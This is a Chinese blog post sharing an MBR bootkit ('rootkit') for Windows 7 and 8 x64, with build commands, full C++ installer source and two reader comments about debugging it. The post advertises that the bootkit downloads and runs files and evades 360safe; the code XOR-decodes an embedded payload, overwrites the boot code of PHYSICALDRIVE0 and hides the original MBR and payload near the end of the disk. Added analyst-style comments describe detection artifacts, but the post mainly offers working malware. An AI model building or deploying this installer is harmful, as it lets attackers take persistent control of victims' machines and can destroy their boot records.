
感染磁盘MBR的rootkit测试视频 下载并运行文件

感染MBR磁盘引导的rootkit
下载并运行文件。
支持win7 x64和win8 x64。
无视360safe。
遇到这种程度的恶意软件也别反抗了。

编译方法:
“F:\JWasm211bw\jwasm.exe” “F:\MBRhack\res\win7_x64.asm”
“F:\JWasm211bw\doslnk.exe” “F:\MBRhack\res\win7_x64.obj” /tiny

// MBR rootkit 2015 
// by Eric21.com

#include <windows.h>
#include <tchar.h>
#include <winioctl.h>
#include "targetver.h"
#include "res/win7_x64.h"
////////////////////////////////////////////
int _tmain()
{
	// Installer for an MBR bootkit — annotated here from a defender's / analyst's
	// point of view, based only on the calls visible below.
	//
	// Sequence of operations:
	//   1. Uses C:\MBR.bin as an "already installed" marker; if it can be opened,
	//      nothing is written.
	//   2. Decodes the embedded payload w764Array (declared in res/win7_x64.h)
	//      in place with a single-byte XOR key (123).
	//   3. Opens \\.\PHYSICALDRIVE0 for read/write (raw disk access, which needs
	//      administrative rights) and then:
	//        - reads the original MBR (LBA 0, 512 bytes);
	//        - overwrites the boot-code area of LBA 0 (bytes 0..445) with the
	//          first 446 bytes of the payload, keeping bytes 446..511 (partition
	//          table and boot signature) from the original sector;
	//        - writes the original MBR to sector (sectors_on_disk - 10);
	//        - writes the rest of the payload (from byte 512 onward, rounded up
	//          to whole sectors) starting at sector (sectors_on_disk - 9);
	//        - writes a copy of the infected MBR to sector (sectors_on_disk - 11).
	//   4. Creates C:\MBR.bin containing "MBR hacked" as the marker.
	//
	// Forensic / IR notes: the observable artifacts are a user-mode process
	// opening PHYSICALDRIVE0 with GENERIC_WRITE, modified boot code in LBA 0,
	// data in the last ~11 sectors of the disk, and the C:\MBR.bin marker file.
	// The untouched original MBR kept at (sectors_on_disk - 10) is what a
	// recovery would copy back to LBA 0.
	//
	// Returns 1 on the normal path and 0 on the early-exit error paths below.
	// The string literals are narrow, so this presumably builds as a non-Unicode
	// (TCHAR == char) project — confirm against the project settings.
	HANDLE hMark;// marker file handle
	hMark = CreateFile("C:\\MBR.bin", GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
	////////////////////////////////////////////////
	if (hMark == INVALID_HANDLE_VALUE)
	{
		// Marker absent: decode the payload in place (single-byte XOR, key 123).
		for (int i = 0; i < sizeof(w764Array); i++)
		{
			//szArray[i] = ~ szArray[i]; // bitwise NOT variant (unused)
			w764Array[i] = w764Array[i] ^ 123; // XOR decode
		}
		DWORD dwSize;
		dwSize = sizeof(w764Array);
		LPBYTE lpBuffer = new BYTE[dwSize];
		memcpy(lpBuffer, w764Array, dwSize);
		// Raw access to the first physical disk; a write handle here is the key
		// detection signal for this kind of installer.
		HANDLE hPhysicalDrive = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
			OPEN_EXISTING, 0, NULL);
		if (hPhysicalDrive == INVALID_HANDLE_VALUE)
		{
			//OutputDebugString("Open Drive0 Failed!");
			delete lpBuffer;
			return 0;
		}
		BYTE BootSector[512];// original MBR (LBA 0)
		DWORD NumberOfBytesRead;
		if (SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
			!ReadFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL))
		{
			//OutputDebugString("Failed to read the original MBR!");
			delete lpBuffer;
			CloseHandle(hPhysicalDrive);
			return 0;
		}
		// Build the infected sector: original MBR with its first 446 bytes
		// (the boot code) replaced by the payload; partition table and
		// signature at 446..511 are left as they were.
		BYTE backBootSector[512];
		memcpy(&backBootSector, &BootSector, 512);
		memcpy(&backBootSector, lpBuffer, 446);


		SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN);// ReadFile advanced the file pointer, so rewind to LBA 0
		WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL);// MBR infection: first 446 bytes replaced

		// Query the disk size so the remaining writes can be placed relative to
		// the end of the disk.
		DISK_GEOMETRY_EX pdg = { 0 };
		DWORD junk = 0;                     // discard results
		DeviceIoControl(hPhysicalDrive,                       // device to be queried
			IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, // operation to perform
			NULL, 0,                       // no input buffer
			&pdg, sizeof(pdg),            // output buffer
			&junk,                         // # bytes returned
			(LPOVERLAPPED)NULL);          // synchronous I/O

		// Back up the original MBR at sector (total_sectors - 10).
		LARGE_INTEGER PositionFileTable;
		PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512;
		PositionFileTable.QuadPart -= 10;
		PositionFileTable.QuadPart *= 512;
		NumberOfBytesRead = 0;
		if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
			!WriteFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL))
		{
			//OutputDebugString("Failed to back up the original MBR");
			delete lpBuffer;
			CloseHandle(hPhysicalDrive);
			return 0;
		}

		// Write the rest of the payload (everything after its first 512 bytes)
		// starting at sector (total_sectors - 9).
		PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512;
		PositionFileTable.QuadPart -= 9;
		PositionFileTable.QuadPart *= 512;
		if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) ||
			!WriteFile(hPhysicalDrive, lpBuffer + 512, ((dwSize - 512) / 512 + 1) * 512, &NumberOfBytesRead, NULL))// raw disk writes: WriteFile's length must be a multiple of 512
		{
			//OutputDebugString("Write Other Failed!");
			delete lpBuffer;
			CloseHandle(hPhysicalDrive);
			return 0;
		}

		// Keep a copy of the infected MBR (the "loader") at sector (total_sectors - 11).
		PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512;
		PositionFileTable.QuadPart -= 11;
		PositionFileTable.QuadPart *= 512;
		if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
			!WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL))// raw disk writes: WriteFile's length must be a multiple of 512
		{
			//OutputDebugString("Write Other Failed!");
			delete lpBuffer;
			CloseHandle(hPhysicalDrive);
			return 0;
		}


		delete lpBuffer;
		CloseHandle(hPhysicalDrive);
		/////////////////////////////////
		// Create the "already installed" marker file.
		char text[] = "MBR hacked";
		DWORD dwBytesWritten = 0;
		HANDLE hFile;// marker file handle
		hFile = CreateFile(
			"C:\\MBR.bin",// name of the file to create or open
			GENERIC_WRITE,// access: write
			0,// share mode 0: no other process may open the file while it is held
			NULL,// SECURITY_ATTRIBUTES: NULL means default security descriptor
			CREATE_ALWAYS,// always create, overwriting any existing file
			FILE_ATTRIBUTE_NORMAL,// plain file attributes
			NULL);
		if (hFile != INVALID_HANDLE_VALUE)
		{
			WriteFile(hFile, text, strlen(text), &dwBytesWritten, NULL);
		}
		CloseHandle(hFile);
	}
	CloseHandle(hMark);

	return 1;
}
////////////////////////////////////////////

http://bbs.pediy.com/showthread.php?t=204938 原作者:lxsgbin
https://github.com/eric21/MBRhack



测试视频,建议全屏观看。

  • 版权声明:本文基于《知识共享署名-相同方式共享 3.0 中国大陆许可协议》发布,转载请遵循本协议
  • 文章链接:http://www.eric21.com/2015/10/25/414 [复制] (转载时请注明本文出处及文章链接)
  • 本文无相关文章

2 条评论


  1. 我最近在win7_X64上测试这个东西,用的是bochs调试,发现在读取gs:0x188时,也就是_KPCR–>_KPRCB–>_KTHREAD结构体时蓝屏,求大神指教。

    1. @光头加暴击 我不是大神啊,我这是从看雪看来的,做了个loader,出了个演示视频而已。你还是去看雪请教原作者吧。
